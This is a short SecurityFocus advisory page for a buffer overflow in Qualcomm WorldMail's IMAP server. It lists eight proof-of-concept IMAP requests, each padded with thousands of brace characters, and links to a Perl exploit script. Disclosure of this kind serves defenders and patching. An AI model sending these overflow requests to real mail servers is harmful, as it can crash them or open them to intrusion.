Qualcomm WorldMail IMAPD Buffer Overflow Vulnerability


The following proof of concept examples of IMAP requests are available:
'02 LIST ""' + '}'x 5000
'03 LSUB ""' + '}'x 32762
'04 SEARCH TEXT ' + '}'x32762
'05 STATUS INBOX ' + '}'x32764
'02 AUTHENTICATE ' + '}'x32768
'02 FETCH 2:4 ' + '}'x10000
'02 SELECT ' + '}'x10000
'02 COPY 2:4 ' + '}'x32765

The following exploit code is available:

http://www.securityfocus.com/data/vulnerabilities/exploits/eudora_wmail.pl


 

Privacy Statement
Copyright 2010, SecurityFocus